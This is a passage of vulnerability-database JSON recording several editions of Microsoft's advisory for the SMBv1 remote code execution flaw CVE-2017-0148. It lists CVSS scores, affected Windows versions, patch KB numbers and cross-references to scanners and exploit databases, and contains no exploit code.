"differentElements": ["msAffectedSoftware"], "edition": 17}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "47d8cff84559a6e03e5ea58b880c90dc", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-06T18:45:07", "history": [], "viewCount": 106, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:156196"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27786", "1337DAY-ID-27613"]}, {"type": "nessus", "idList": ["700059.PRM", "700099.PRM", "MS17-010.NASL", "SMB_NT_MS17-010.NASL"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-06T18:45:07", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-06T18:45:07", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3213986", "KB4012598", "KB4012214", "KB3210720", "KB4012216", "KB4012212", "KBMS16-110, 3187754", "KB4013198", "KB4012213", "KB3205409", "KB3177186", "KB3212646", "KB3205401", "KB4012215", "KB3210721", "KB4012217", "KB4012606", "KB4013429"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-06T18:45:07", "differentElements": ["msAffectedSoftware"], "edition": 18}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "1455b21b7b338994ddec7ae57c94d0af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-07T08:44:10", "history": [], "viewCount": 106, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10977", "KLA10979"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:41987"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-07T08:44:10", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-07T08:44:10", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4013429", "KB4012213", "KB4012215", "KB3212646", "KB4013198", "KB4012598", "KB3210720", "KB3210721", "KB4012214", "KB3205401", "KB4012606", "KB4012216", "KB3213986", "KB3177186", "KB4012217", "KB4012212", "KBMS16-110, 3187754", "KB3205409"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-07T08:44:10", "differentElements": ["msAffectedSoftware"], "edition": 19}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "47d8cff84559a6e03e5ea58b880c90dc", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-07T10:44:22", "history": [], "viewCount": 106, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA10979", "KLA11902"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142181"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "zdt", "idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27613"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:41987"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL", "700059.PRM"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-07T10:44:22", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-07T10:44:22", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012214", "KB4012212", "KB3213986", "KB3210720", "KB3205401", "KB4012598", "KB3177186", "KBMS16-110, 3187754", "KB3212646", "KB4013198", "KB4013429", "KB4012216", "KB4012606", "KB3210721", "KB4012215", "KB3205409", "KB4012213", "KB4012217"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit 